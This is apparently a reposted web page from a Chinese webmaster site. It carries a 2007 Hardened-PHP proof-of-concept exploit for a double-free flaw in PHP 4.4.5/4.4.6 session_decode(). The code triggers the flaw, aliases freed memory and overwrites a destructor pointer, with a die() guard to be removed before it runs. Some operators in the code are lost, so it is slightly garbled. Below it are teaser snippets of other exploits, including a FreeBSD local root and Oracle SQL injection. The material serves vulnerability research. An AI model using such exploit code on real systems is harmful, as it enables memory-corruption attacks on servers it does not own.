首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

所属分类: 网络安全 / Exploit 阅读数: 221
收藏 0 赞 0 分享
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP 4.4.5/4.4.6 session_decode() Double Free Vulnerability //
//////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE"); ini_set("session.serialize_handler", "php");
session_start(); $varname = str_repeat("D", 39);
$$varname = &$_SESSION; // Trigger the double free

session_decode($varname.'|i:0;');
$_________________x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJ";
$_________________a = array("OneElement"); // Now x and a point to the same memory. Therefore x can be used to modify a // Overwrite pointer to the destructor
$_________________x[8*4 0] = chr(0x55);
$_________________x[8*4 1] = chr(0x66);
$_________________x[8*4 2] = chr(0x77);
$_________________x[8*4 3] = chr(0x88);

// Trigger the destruction
unset($_________________a);
?>
更多精彩内容其他人还在看

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

<a name="upload-file"></a><h2>WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD</h2> <h3>S
收藏 0 赞 0 分享

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

<?php //////////////////////////////////////////////////////////////////////// // _ _ _
收藏 0 赞 0 分享

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

// ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin (you 31337!!! ;)) // thanks to sacrin
收藏 0 赞 0 分享

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

#!/usr/bin/perl # # Remote Oracle KUPM$MCP.MAIN exploit (10g) # # Grant or revoke dba permission to unprivileged user # #
收藏 0 赞 0 分享

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field b
收藏 0 赞 0 分享

MS Internet Explorer Recordset Double Free Memory Exploit

<HTML> <!-- ********************************************************************************** Microsoft Internet Explo
收藏 0 赞 0 分享

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

#!/usr/bin/python # Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability # was discovered by h07 and a POC for wi
收藏 0 赞 0 分享

Linux Kernel

/* Linux Kernel DCCP Memory Disclosure Vulnerability Synopsis: The Linux kernel is susceptible to a locally exploitable flaw w
收藏 0 赞 0 分享

MS Internet Explorer (FTP Server Response) DoS Exploit

#!/usr/bin/perl # MS 07-016 FTP Server Response PoC # Usage: ./ms07016ftp.pl [LISTEN_IP] # # Tested Against: MSIE 6.0290
收藏 0 赞 0 分享

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

#!/usr/bin/python # MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit # Bug discovered by Krystia
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 www.zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-22